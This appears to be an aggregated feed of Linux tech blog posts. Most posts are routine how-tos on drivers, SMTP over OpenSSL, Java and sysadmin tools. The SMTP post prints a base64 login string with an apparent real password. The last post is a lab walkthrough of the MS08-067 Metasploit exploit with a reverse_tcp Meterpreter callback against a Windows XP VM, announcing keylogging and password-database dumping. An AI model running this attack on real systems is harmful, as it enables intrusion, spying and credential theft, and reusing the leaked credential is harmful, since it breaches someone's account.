09 Feb 2016

Laptop ini memiliki kepingan kombo WLAN + Bluetooth dengan merk Realtek  8723BE. Setelah lama mencari-cari di jagat Internet, berikut apa yang saya lakukan sehingga WLAN dapat berjalan.

Memasang Penggerak rtlwifi-new

Pasang penggerak dari PPA:

sudo add-apt-repository ppa:hanipouspilot/rtlwifi
sudo apt-get update
sudo apt-get install rtlwifi-new-dkms linux-firmware

Set Region

Lalu, cek apakah WIFI telah ditandai region apa:

sudo iw reg get

Pada kasus saya, masih bernilai 00 (tak bernegara). Saya pun set jadi Indonesia:

sudo iw reg set ID

Sesuai dengan kode negara di ISO.

Sesudah itu, supaya berjalan benar, ubah berkas di /etc/default/crda dengan domain negara kita.

REGDOMAIN=ID

Set IOMMU pada GRUB

Konfigurasikan ulang GRUB: (ganti grub-efi-amd64 dengan grub-pc kalau masih BIOS belum UEFI)

sudo dpkg-reconfigure grub-efi-amd64

Tambahkan baris berikut pada Linux command line:

iommu=soft

umLalu OK semua.

Setelah ini, lalu nyalakan ulang laptop dan selesai.

on 09 Feb 2016 04:35 PM

08 Feb 2016

In this tutorial, I will show you how to send email via gmail server using openssl. Before you can use telnet to do it. But since Google implement TLS-encrypted connection, you can’t do that anymore unless you upgrade your telnet with ssl capability.

OpenSSL version that I use is OpenSSL 1.0.1f 6 Jan 2014. You can check your version using command openssl version -a.
darklinux@darklinux:~$ openssl version -a OpenSSL 1.0.1f 6 Jan 2014 built on: Thu Jun 11 15:26:18 UTC 2015 platform: debian-i386 options: bn(64,32) rc4(8x,mmx) des(ptr,risc1,16,long) blowfish(idx) compiler: cc -fPIC -DOPENSSL_PIC -DOPENSSL_THREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -DL_ENDIAN -DTERMIO -g -O2 -fstack-protector –param=ssp-buffer-size=4 -Wformat -Werror=format-security -D_FORTIFY_SOURCE=2 -Wl,-Bsymbolic-functions -Wl,-z,relro -Wa,–noexecstack -Wall -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM OPENSSLDIR: “/usr/lib/ssl” darklinux@darklinux:~$

Before we start, I will give you a prove that we can’t use telnet to connect to gmail server.
darklinux@darklinux:~$ telnet smtp.gmail.com 587
Trying 74.125.200.108…
Connected to gmail-smtp-msa.l.google.com.
Escape character is ‘^]’.
220 smtp.gmail.com ESMTP p8sm40810771pfi.34 – gsmtp
helo
250 smtp.gmail.com at your service
mail from: <taufanlinux@gmail.com>
530 5.7.0 Must issue a STARTTLS command first. p8sm40810771pfi.34 – gsmtp

darklinux@darklinux:~$ telnet smtp.gmail.com 465
Trying 74.125.68.108…
Connected to gmail-smtp-msa.l.google.com.
Escape character is ‘^]’.
helo
#####FConnection closed by foreign host.
darklinux@darklinux:~$

As you see above, both connection are rejected. Gmail server request for STARTTLS.
STARTTLS is an extension to plain text communication protocols, which offers a way to upgrade a plain text connection to an encrypted TLS (Trasnport Layer Security) or SSL (Secure Socket Layer) connection instead of using a separate port for encrypted communication.

What is openssl?
Before we start, I will explain a bit about OpenSSL. OpenSSL is general purpose cryptography library that provide open source implementation of TLS and SSL protocols. It was developed in 1998 and become widely used. In 2014 two thirds of all web servers use OpenSSL. Version are available for Linux, Solaris, Mac OS, BSD, OvenVMS and windows.

In order to connect to gmail server, you need to provide the user id and password. This user id and password must be convert to base64 encryption format because gmail server use this cipher encryption.
The format is: \000your_gmail\000your_password.
If my gmail user id is taufanlinux@gmail.com and my password is type123456, the format will be:
\000taufanlinux@gmail.com\000type123456.

You can use python to convert it to base64.
darklinux@darklinux:~$ python
Python 2.7.6 (default, Jun 22 2015, 18:00:18)
[GCC 4.8.2] on linux2
Type “help”, “copyright”, “credits” or “license” for more information.
>>> import base64
>>> authplain = base64.b64encode(‘\000taufanlinux@gmail.com\000type123456’)
>>> authplain
AHRhdWZhbmxpbnV4QGdtYWlsLmNvbQB0eXBlMTIzNDU2
>>>
AHRhdWZhbmxpbnV4QGdtYWlsLmNvbQB0eXBlMTIzNDU2 is my authentication code.
openssl03

Below are the steps:
Step 1. Connect to gmail server.
After you get the authentication code, then you can connect to gmail server. Type openssl s_client -connect smtp.gmail.com:465 -crlf.
s_client option will tell openssl to establish TLS/SSL client a transparent connection to a remote server.
connect is command to connect to
smtp.gmail.com is the remote server
465 is the smtp server port.
crlf (create line feed enter). Make sure to add this option otherwise you can’t send the email after you finish the email content with .(dot).

darklinux@darklinux:~$ openssl s_client -connect smtp.gmail.com:465 -crlf
CONNECTED(00000003)
depth=2 C = US, O = GeoTrust Inc., CN = GeoTrust Global CA
verify error:num=20:unable to get local issuer certificate
verify return:0

Certificate chain
0 s:/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com
i:/C=US/O=Google Inc/CN=Google Internet Authority G2
1 s:/C=US/O=Google Inc/CN=Google Internet Authority G2
i:/C=US/O=GeoTrust Inc./CN=GeoTrust Global CA
2 s:/C=US/O=GeoTrust Inc./CN=GeoTrust Global CA
i:/C=US/O=Equifax/OU=Equifax Secure Certificate Authority

Server certificate
—–BEGIN CERTIFICATE—–
MIIEgDCCA2igAwIBAgIITzzp9mJ728kwDQYJKoZIhvcNAQELBQAwSTELMAkGA1UE
BhMCVVMxEzARBgNVBAoTCkdvb2dsZSBJbmMxJTAjBgNVBAMTHEdvb2dsZSBJbnRl
cm5ldCBBdXRob3JpdHkgRzIwHhcNMTYwMTI3MTMxNTU5WhcNMTYwNDI2MDAwMDAw
WjBoMQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwN
TW91bnRhaW4gVmlldzETMBEGA1UECgwKR29vZ2xlIEluYzEXMBUGA1UEAwwOc210
cC5nbWFpbC5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCX9nfK
WcIh8WVTpu31NGmHFkdWlFkizVNCGf8nJtAQ4k6Q3ok38ZLs+AcXROLuGdcliqJ4
AXlpf1sE3dhLkmJ/Ge9f+AMAO0yf0yibHcSXK0oy546T6D381hfB9o+vCkQLaWjk
Eyodumtlb1025i2+3h72Aax0AqRYetDsmlEu6HUdT/KOmDRhRq8mfeFtZ0Kdtnq/
q6x5pMlZfvAHYt21nCp+lLHCbppPu/fcMgbs9s39BEH9pY65M+AsLz0wNoLgyusX
L+gL3ZgO1bZsaOP6CsNF4ZzTEJC79v51RhaX2xu35dUN8Q/VjMHRrErH8sovLuXw
63/bCG7j1Jw+VVmtAgMBAAGjggFLMIIBRzAdBgNVHSUEFjAUBggrBgEFBQcDAQYI
KwYBBQUHAwIwGQYDVR0RBBIwEIIOc210cC5nbWFpbC5jb20waAYIKwYBBQUHAQEE
XDBaMCsGCCsGAQUFBzAChh9odHRwOi8vcGtpLmdvb2dsZS5jb20vR0lBRzIuY3J0
MCsGCCsGAQUFBzABhh9odHRwOi8vY2xpZW50czEuZ29vZ2xlLmNvbS9vY3NwMB0G
A1UdDgQWBBSegxW81AyX1CL9DItwhfN+UNFFazAMBgNVHRMBAf8EAjAAMB8GA1Ud
IwQYMBaAFErdBhYbvPZotXb1gba7Yhq6WoEvMCEGA1UdIAQaMBgwDAYKKwYBBAHW
eQIFATAIBgZngQwBAgIwMAYDVR0fBCkwJzAloCOgIYYfaHR0cDovL3BraS5nb29n
bGUuY29tL0dJQUcyLmNybDANBgkqhkiG9w0BAQsFAAOCAQEAWzUFgHwcZK64kH9P
UJuhr+huE1+vEWQ+xJivjUqMg2Jm1KEX9QX8JCV8d9lvcxj2G7iqDowoJc55kEpP
m2HezvsLdfDrwMMPnAG1cmcmOZ67zHY+i64S/Xl0J56y1DTVPq7Oy1ZsqSNdpanv
rpilxEXy9Syu9AwWjABwkANcEYEir9FrowXjPCgzB6wdvO6R60wqdIBC+/7qNhtI
+AjTSoMypHx5dfHK7vNI0UEGktRF4VFOX70vrCdOGZ5l7LUHMlpL8BexcwcGj4pK
UAfn0RdHdtQ3mn0Ybgv2JZ8ayMVlZ4gVE+FYEIr+0CAfVR4l/odv2GRKzpTrNeWE
VhTzbg==
—–END CERTIFICATE—–
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com
issuer=/C=US/O=Google Inc/CN=Google Internet Authority G2

No client certificate CA names sent

SSL handshake has read 3727 bytes and written 421 bytes

New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES128-GCM-SHA256
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES128-GCM-SHA256
Session-ID: 96046DE5F3B84FD91F77CC0F426737A5525F9A8D24D97C79A2E81920C4883235
Session-ID-ctx:
Master-Key: 026F4D4E1AF8C445AF39AA99DB3C40EE916901102B4BC4CFA7A29B06F85EFA5D2E052BDD33F5DFD56CE63C71BCE7C3EA
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 100800 (seconds)
TLS session ticket:
0000 – 81 3f 63 38 6f 95 ba bb-63 8d f5 8c 7c ba cd 47 .?c8o…c…|..G
0010 – ce 38 c2 d2 3e ef 7c 04-13 cf 14 a9 8f a1 6f d8 .8..>.|…….o.
0020 – e9 c6 52 0b 14 1c c7 04-4c c9 02 b4 fc 1f 4d 53 ..R…..L…..MS
0030 – 50 73 a3 b9 92 3d 3e e8-02 38 6d b5 a3 22 db 89 Ps…=>..8m..”..
0040 – 24 19 04 22 00 54 3a 45-04 8e db f0 c7 60 4d 0a $..”.T:E…..`M.
0050 – da 4b 63 cb 6b 71 66 c5-8d 4a a8 d0 37 67 79 7e .Kc.kqf..J..7gy~
0060 – 20 10 35 89 aa 34 c2 63-d4 a9 a0 39 7c 25 b6 4a .5..4.c…9|%.J
0070 – 80 ad 78 ca 66 02 44 66-75 07 d4 71 88 a0 30 37 ..x.f.Dfu..q..07
0080 – 0a 51 c8 98 d4 03 fa e9-05 86 d3 64 af e9 fa 20 .Q………d…
0090 – 55 fc d5 22 cb 60 d4 95-c9 18 1f ce b5 1d 5c 2b U..”.`……..\+
00a0 – 9e d4 1d 7e …~
Start Time: 1454911916
Timeout : 300 (sec)
Verify return code: 20 (unable to get local issuer certificate)

220 smtp.gmail.com ESMTP xz6sm40211442pab.42 – gsmtp
openssl01
openssl02

Step 2.Say Hello to smtp server.
Some smtp server use ‘helo‘ some use ‘ehlo (extended helo)’. No need to put word after it.
You will get commands available is the smtp server is ready for your service.

ehlo
250-smtp.gmail.com at your service, [180.252.140.219]
250-SIZE 35882577
250-8BITMIME
250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-CHUNKING
250 SMTPUTF8

Step 3. Login to the server
You can use Auth Login or Auth Plain. In this tutorial I use auth plain.
Put your attentication code after auth plain. You will get 235 2.7.0 Accepted if your user id and password are correct.

auth plain AHRhdWZhbmxpbnV4QGdtYWlsLmNvbQB0eXBlMTIzNDU2
235 2.7.0 Accepted

Step 4. Set your destination email and send it.
There are few data that you need to set.
mail from: <your gmail address> → your email address
rcpt to: <your destination email> → recipient address or your destination email address.
data → to set your email content.
-. (dot) → to end your email content and send it.

mail from: <taufanlinux@gmail.com>
250 2.1.0 OK xz6sm40211442pab.42 – gsmtp
rcpt to: <taufanlinux@gmail.com>
250 2.1.5 OK xz6sm40211442pab.42 – gsmtp
data
354 Go ahead xz6sm40211442pab.42 – gsmtp
this is a test.
.
250 2.0.0 OK 1454912007 xz6sm40211442pab.42 – gsmtp
If you get 250 2.0.0 OK,it mean your email has already sent.
openssl04


on 08 Feb 2016 11:02 AM

06 Feb 2016

Hair Tonic Mirip Debian

Dedy Hariyadi

Tak sengaja sewaktu belanja di suatu perbelanjaan sekitar Seturan melihat produk-produk untuk rambut melihat suatu logo yang tidak asing. Logo yang digunakan hair tonic merk mylea mirip sekali dengan logo Debian. Sebagai pengguna sistem operasi turunan Debian tentu tidak asing dengan logonya. Saya pikir Debian memiliki perusahaan dengan produk hair tonic. Coba Anda perhatikan logo Debian yang tercantum di https://www.debian.org/logos dengan foto dibawah ini.

on 06 Feb 2016 10:51 AM

04 Feb 2016

RStudio like IDE for Python: IEP

Putu Wiramaswara Widya

I finally found an IDE for Python (basically just text editor with console on it) that has “execute selected code” feature like one in RStudio: IEP or Interactive Editor Python (http://www.iep-project.org/). This IDE is Free and Open Source, plus it runs on multiple OSes thanks to QT library. Even though it lacks some feature like obvious “Set as working directory”, the customizable UI plus it won’t hang itself during some demanding function calling (I had another IDE that has this bugs, I forgot the name of it) made this editor usable for more than a week I have been using it.

on 04 Feb 2016 04:54 AM

03 Feb 2016

# Microsoft Share Point 2013 Installation

## Pre requisite

### Server Side
#### 3 tier Model
1. Domain Controller server
Windows Server 2012
2. SQL Server
Join Domain
Create User
* spSql
SQL Server Database Engine and SQL Agent Service Account
* spAdmin
For SharePoint Setup and Configuration Wizard
Domain User Account
Local Administrator deployment server
SQL Server login with securityadmin and dbcreator roles,public,sysadmin
* spFarm
Configure and manage server farm, application pool identity for central administration and run microsoft foundation workflow timer service
Domain User Account
SQL Server Login with securityadmin,dbcreator, and db_owner for sharepoint databases in server farm

3. Share Point Server
Join Domain
Internet Connection

#### Join domain
Setting DNS to your Active Directory Server
1. Go to System Properties
2. klik Change…
3. fill Computer Name and Member of Domain
#### Add spadmin account in your server
Right klik my computer > manage
open server manager>configuration>local users and Groups>Groups
Right clik Administrator>properties
klik add enter spadmin>check names > OK > OK
Close server Manager

#### Create DB user
Open SQL Server Management Studio from start button.
Fill Server Type, SErver Name, Authentication>Windows Authentication>TEST01\Administrator>connect
open SQL Server>Security>logins and then right click on login>new login
Open New Windows click search>Location>entire directory>Domain01.local>ok
spadmin > check names > ok
klik Server Roles Page> tick dbcreator and securityadmin>ok

Right click SQL Server>Properties>Advanced page>Max Degree of Parallelism>1>ok

### Share Point Installation
Open file directori of installation, open splash.hta
Install SOftware Prerequisite

Open splash.hta again and select Install SharePOint Server
Select Complete for server type
thick the Sharepoint products configuration wizard now.
Next > Create A new Server Farm
Database Server : test01
Database Name : SharePoint_COnfig
Username : domain01\spFarm
Password : ***

Specify Port Number : 8181
Sec Setting : NTLM
Next>Successful

open browser


on 03 Feb 2016 12:49 AM

02 Feb 2016

Secure Mail

Untuk melihat surel yang menyangkut di Postfix

postcat -q <ID>

 

on 02 Feb 2016 04:17 AM

28 Jan 2016

spring

Operasi basis data biasa mengenal akronim CRUD yang berarti Create (Buat), Read (Baca), Update (Modifikasi), dan Delete (Hapus). Operasi-operasi ini lazim diterapkan pada bisnis sehari-hari. Namun, pada beberapa data kritikal, operasi hapus tidak boleh benar-benar dilakukan. Yang dilakukan hanya mengubah agar data tersebut tidak terlihat/aktif di aplikasi, namun secara fisik masih ada di basisdata.

JPA Pada Umumnya

Sebagai contoh, misalkan ada kelas entitas akun yang biasa dibuat oleh orang.

// ... import omitted
@Entity
public class Account{
	@Id @GeneratedValue(strategy = GenerationType.AUTO)
	@Column(name="ACCOUNT_ID")
	long id;

	String name;

	// JPA needs default constructor
	public Account() {}

	public Account(String name) {
		this.name = name;
	}

	// ... Setter and getter omitted
}

Pada kelas Account.java seperti biasa kita membuat kolom-kolom biasa. Lalu, misalkan dengan Spring Boot JPA, dibuatkan sebuah kelas Repository yang akan digunakan untuk melakukan operasi-operasi CRUD:

public interface AccountRepository extends CrudRepository <Account, Long>{

}

Saya akan menunjukkan selanjutnya bagaimana mengubah pola CRUD menjadi CRUH (Hide). Operasi CRUH hanya istilah saya saja yang artinya hanya menyembunyikan, bukan menghapus data (hapus-sembunyi).

CRUH dengan JPA

Salah satu solusi untuk operasi hapus-sembunyi adalah dengan menggunakan penanda. Kolom penanda ini digunakan untuk menyatakan data tersebut sudah terhapus. Sehingga, klien/aplikasi hanya akan mendapatkan data yang tidak ditandai. Solusi ini dapat dicapai dengan minimal melalui Spring JPA.

Pada JPA, yang diubah cukup hanya kelas entitas saja. Hal-hal yang diperlu dilakukan:

  • Ubah operasi hapus dengan menandai kolum penanda. Misalnya pada baris 4 operasi SQL hapus dimodifikasi dengan mengubah nilai deleted menjadi ‘1’.
  • Ubah operasi baca dengan mengambil data yang kolom penandanya belum diset. Misalnya pada baris 5, dicari deleted tidak sama dengan ‘1’.
  • Buat sebuah kolom penanda. Misalnya pada baris 13, ditambahkan kolom deleted. 
  • Pada baris 12 dibuatkan sebuah anotasi @JsonIgnore agar kolom ini tidak muncul pada akses data melalui Repository. Jadi, kolom ini benar-benar transparan.
  • Jangan lupa diinisialisasi data deleted pada konstruktor.

// ... import omitted
@Entity
@SQLDelete(sql="UPDATE item SET deleted = '1' WHERE item_id = ?")
@Where(clause="deleted <> '1'")
public class Account{
	@Id @GeneratedValue(strategy = GenerationType.AUTO)
	@Column(name="ACCOUNT_ID")
	long id;

	String name;

	@JsonIgnore
	String deleted;

	// JPA needs default constructor
	public Account() {}

	public Account(String name) {
		this.name = name;
		this.deleted = '0';
	}

	// ... Setter and getter omitted
}

Semoga bermanfaat.

on 28 Jan 2016 09:44 AM

22 Jan 2016

Seperti telah diketahui bahwa Ansible baru saja merilis versi terbaru (versi 2) yang tentunya dengan tambahan berbagai fitur dan perbaikan. Tutorial ini adalah langkah-langkah cara memasang Ansible terbaru di debian 8 (jessie). Cara paling mudah adalah menggunakan apt-get install, tapi dengan cara ini versi ansible yang terinstall belum versi yang terbaru, masih versi 1.7.2. Nah berhubung […]
on 22 Jan 2016 09:56 AM

Yes, I would admit this: I have been comfortable using Windows 10 as main OS in my notebook since it was released around August 2015. Nevertheless, I am still using Linux in my laboratorium workstation though.

I would kind to appraise Windows 10 for its incremental regular update (that would promise some new incremental feature somehow). But after around six months using it, I felt like somehow there is nothing much better since its been released: The right-click menu still somewhat inconsistent, the title bar still white as ghost and never had any new feature November Update would promised even though I regularly checked Windows Update.

After I checked via “winver” program (Win+R, “winver”, OK), turns out that my Windows 10 system have been somehow stuck with Build 10240 (the first stable build of Windows 10) and goes nowhere further. Reading this article from Wikipedia made me realize that there have been so many new build that I left behind. Furthermore, Windows Update won’t give any help or anything to upgrade my Windows at least into build 10586.

For those who happens to have same issue, the easiest and hassle-free solution is to Upgrade your Windows 10 using the latest Windows 10 Update Tool. You can grab it directly from https://www.microsoft.com/en-gb/software-download/windows10.

winver.png
on 22 Jan 2016 08:50 AM

21 Jan 2016

Kemarin baru aja kelar setel-setel dan nempatin peladen (baru) di kantor. Sebelum bener-bener siyap dipakek, saya coba-coba untuk mensimulasikan akses ke dalam peladen. SSH sudah disiapkan dan sejauh percobaan, akses menggunakan SSH berjalan dengan baik.

Hnah, tapi...itu khan kalo yang menggunakan cuman saya seorang. Komputer yang saya gunakan, sistem operasinya adalah GnU/Linux Ubuntu yang notabene ngga' ada masalah spesifik ketika melakukan kontrol jarak jauh ke peladen. Kembali ke peladen, peladen tersebut akan digunakan oleh pemrogram di kantor yang kesehariannya menggunakan sistem operasi berbeda.

Bisa saja memang, dengan menggunakan aplikasi klien FTP seperti Filezilla. Menggunakan Filezilla relatif mudah, karena aplikasi ini merupakan aplikasi multi-platform. Jadi tersedia untuk berbagai jenis sistem operasi.

Kemaren, penggunaan Filezilla ini terkendala pada akses ke dalam direktori root web. Ternyata harus punya akses tulis. Setelah cari tau, ternyata bisa dilakukan dengan mengubah hak kepemilikan direktori tersebut. Tinggal setel kepemilikan ke akun login yang digunakan (selain akun root), jreng, sudah bisa baca tulis ke dalam direktori root web. Masih belom tau apakah solusi yang saya terapkan ini cukup aman atau tidak. Silahkan berikan masukan. Peladennya hanya bisa diakses lokal sich. Mungkin perlu dipikirkan cara lain ya, kalo misalnya peladen bisa diakses via internet :).

Hnah, setelah dipikir-pikir lagi tentang bagaimana mengakses peladen dengan cara yang "lebih umum" ya? Kepikiran buat pasang (gaya dah :D) panel kontrol seperti cpanel yang ada di hosting-hosting ituh. Pilihannya banyak ya ternyata. Tapi akhirnya saya memutuskan buat pasang...AJENTI.

Pemasangan Ajenti di sistem operasi GnU/Linux ternyata cukup mudah ya. Untuk sistem operasi yang terpasang di dalam peladen yang sudah saya setel, GnU/Linux Debian 8.2, cara pemasangannya jugak sudah tersedia repo yang bisa ditambahkan ke dalam sources.list.

Untuk pemasangan di pada GnU/Linux Debian dapat menggunakan panduan dari situs Ajenti. Tapi, setelah dipasang Ajenti-nya, saya ketemu masalah seperti gambar di bawah:

Ini...beneran kagak tau kenapa dah. Padahal proses pemasangan ngga' ada masalah jugak. Setelah mencari pencerahan, akhirnya ketemu jugak permasalahannya di mana yang dibahas via forum pengguna Ajenti.

Untuk mengatasi masalah akses di atas, hal yang saya lakukan adalah, memasang paket python-dev dan menyunting berkas ssl.py seperti yang dapat dilihat pada solusi seperti gambar di bawah:




Daaaann...akhirnya...Ajenti yang saya pasang, bisa diakses...yay!!!





Yoyoy...demikian. Semoga bisa memudahkan kerja-kerja di peladen ini :).
on 21 Jan 2016 02:11 AM

20 Jan 2016

Membaca PPA Shnatsel bahwa DNSCrypt racikannya telah dinyatakan tidak dikembangkan kembali. Sebelumnya saya memang menggunakan racikannya Shnatsel. Akhirnya "bersih-bersih" dan beralih ke DNSCrypt racikan Pascal Mons.

Seperti biasa rutinitasnya menambahkan repo DNSCrypt buatan Pascal Mons menggunakan perintah sudo add-apt-repository ppa:anton+/dnscrypt. Installasinya menggunakan perintah sudo apt-get update && sudo apt-get install dnscrypt-proxy.

Proses installasi selesai, sunting terlebih dahulu berkas /etc/dhcp/dhclient.conf. Pada bagian supersede domain-name-servers tambahkan baris sehingga menjadi supersede domain-name-servers 127.0.0.2;. Simpan berkas tersebut dan restart jaringan Anda.

Untuk memeriksa bahwa DNSCrypt berjalan dengan baik silakan diuji menggunakan www.dnsleaktest.com.
on 20 Jan 2016 10:28 AM

Daily Korean Vocabulary #1

Putu Wiramaswara Widya

Living in Korea would be a nightmare if you could not make any simple conversation in Korean, at least that’s how I am experiencing here for about four months. From beginning, I am a big no-no to try speak to them in English unless they started it first or it is in academic situation, so that I learn many Korean basically just by myself and take same Language Immersion steps with some local (Not very intense, just when I need something to buy or dealing with stranger 아저씨 that want to make a chat with 외국인).

One problem that still facing me to learn Korea is how different their vocabulary are, even though they are familiar with some English (and to some extent, Konglish) word, it is not as many as borrowed word from Chinese (Sino-Korea, 한자어). So from today, I want to try to make a daily Korean Vocabulary chart based mainly from Sino-Korean word etymology and any other context-specific term. This Daily Korean Vocabulary is basically intended to someone who know at least very basic Korean Writing System (한글) and Korean Grammar so I will not depicted any romanization whatsoever in here (I found that new Korean Romaja System are kinda awkward for English speaker to read, it’s better to learn the system directly from 한글)

For the first #1, I will introduce the usage of Hanja: 상 (想) which have a meaning surrounding idea and thought (In Hanja Dictionary, it is called 생각 상). The word 상 are not used by itself in Korean so you need to use it in word with atleast two syllables.

1-sang.png

PS: If you have problem seeing the image above, just click on it to see it.

on 20 Jan 2016 02:26 AM

15 Jan 2016

Baseboard

Arif Syamsudin

Jadi...perintah utamanya adalah:

# dmidecode

Perintah di atas akan memberikan informasi terkait komponen perangkat keras sistem. Setidaknya itu yang dikatakan sama man-nya dmidecode. Dalam format yang bisa dimengerti manusia. Human-readable format. Sebagian kutipan tentang apa itu dmidecode:
"... tool  for dumping a computer's DMI (some say SMBIOS) table contents in a human-readable format. This table contains a description of the system's hardware components, as well as other useful pieces of information such as serial numbers  and  BIOS  revision. Thanks to this table, you can retrieve this information without having to probe for the actual hardware. While this is a good point in terms of report speed and safeness, this also makes the presented information possibly unreliable."
Untuk penggunaan perintah lebih jauh, silahkan baca manual penggunan dmidecode yang bisa dimunculkan dengan perintah:

# man dmidecode

Saya coba-coba, untuk melihat, secara spesifik, tipe papan-induk (baca: motherboard) yang dipasang pada komputer yang kita gunakan, kita dapat menggunakan perintah:

# dmidecode --type baseboard

Keluarannya, sebagai contoh komputer yang saya gunakan di kantor, adalah sebagai berikut:

# dmidecode 2.11
SMBIOS 2.7 present.
Handle 0x0002, DMI type 2, 15 bytes
Base Board Information
Manufacturer: ASRock
Product Name: H61M-VS3
Version:                       
Serial Number: M80-33002103546
Asset Tag:                       
Features:
Board is a hosting board
Board is replaceable
Location In Chassis:                       
Chassis Handle: 0x0003
Type: Motherboard
Contained Object Handles: 0
Keluarannya sedikit mirip dengan perintah WMIC BASEBOARD yang dieksekusi via terminal pada sisop MS Windows.

Demikian. Semoga bermanfaat dan selamat bereksplorasi :).

Bahan bacaan:

  1. https://tuanpembual.wordpress.com/2016/01/15/mencari-detail-perangkat-keras-di-gnulinux/
on 15 Jan 2016 01:15 PM

14 Jan 2016

REST

Ada SOAP UI.

Ada Postman.

Kalaulah saya cukup HttpRequester karena saya menggunakan Firefox.

HttpRequester

HttpRequester

on 14 Jan 2016 05:32 PM

12 Jan 2016

Perangkat yang terhubung

Arif Syamsudin

Sekedar ringkasan untuk pengingat. Gunakan nmap. Ini perintah yang dianjurkan oleh situs bacaan saya:

# nmap -sP kisaran-ip-yang-anda-gunakan/24

contoh, karena ip yang digunakan oleh perangkat saya yang terhubung ke jaringan lokal adalah 10.2.2.121, maka untuk menggantikan kisaran-ip-yang-anda-gunakan adalah:

# nmap -sP 10.2.2.0/24

Nah, silahkan dicoba :). Perintah di atas akan mendaftar ip dan mac address dari perangkat yang terhubung di dalam jaringan. silahkan mengeksplorasi berbagai variabel perintah di dalam nmap :).

on 12 Jan 2016 01:56 PM

10 Jan 2016

versi os

Arif Syamsudin

Karena setelah sekian lama, perintah:

$ cat /etc/lsb-release

sudah tidak digunakan lagi untuk menunjukkan versi os yang digunakan, alih-alih saya menggunakan perintah ini:

$ cat /etc/os-release

Seperti yang sudah saya sebutkan di atas, perintah ini digunakan untuk melihat versi os GnU/Linux yang digunakan di dalam satu mesin. Kebetulan saya pengguna GnU/Linux Debian 8.1, jadi bentuk keluarannya adalah:

root@theminion:/home/buitenzorg812# cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="https://bugs.debian.org/"

Demikian, semoga bermanfaat :).
on 10 Jan 2016 03:14 PM

Desclimer:
In this tutorial, I will show you to hack Ms-windows xp. It’s for training purpose only. I’m not responsible for any misused. You will learn about, grap a screenshot of the interactive desktop target, check list running processes, capturing key strokes and get contents of SAM database.

There 2 exploit modules that I will use, ms08_067_netapi and reverse_tcp.

The ms08_067_netapi exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs.

This exploit can be used also for MS windows 2000 universal and MS Windows 2003 universal, SP1 and SP2.

The reverse_tcp will inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker.

————————————————————————————————Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2008-10-28
———————————————————————————————–Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
Module: payload/windows/meterpreter/reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 281
Rank: Normal

———————————————————————————————–

For hacking test I run:
-MS windows XP service pack 2 run in Virtual Box R 5.0.0 r101573 with network setting ‘host only adapter‘.
Metasploit v4.11.4-2015071402 in Linux Ubuntu 14.04 LTS Trusty Tahr
msfxp00

Below are the steps:
1.Run metasploit. Check your IP address and scan the network.
# msfconsole
msf > ifconfig | grep addr (check your ip address)
msf > nmap -sP 192.168.56.1-254 (scan the network)
msfxp01
msfxp02

2.Check OS target
msf > nmap -O 192.168.56.101 (check OS from target IP)

 

3.Use and run the exploit
msf > use exploit/windows/smb/ms08_067_netapi (use ms08_067_netapi exploit)
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1 (set local ip address)
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101 (set remote ip address)
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp (set payload)
msf exploit(ms08_067_netapi) > exploit
msfxp03

4.Ready for hack
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (885806 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1043) at 2016-01-10 19:21:16 +0700
meterpreter >

 

GRAB SCREENSHOT OF TARGET DESKTOP SCREEN
Type “screenshot” in meterpreter command prompt.
meterpreter > screenshot
Screenshot saved to: /root/kyHNSHFb.jpeg
msfxp04

CHECK OF LIST RUNNING PROCESSESS
Type “ps”, to list the running application in target OS.

meterpreter > ps
Process list
============
PID Name Arch Session User Path
— —- —- ——- —- —-
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
264 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
356 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
532 wscntfy.exe x86 0 LABTEST\Lab Test C:\WINDOWS\system32\wscntfy.exe
568 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
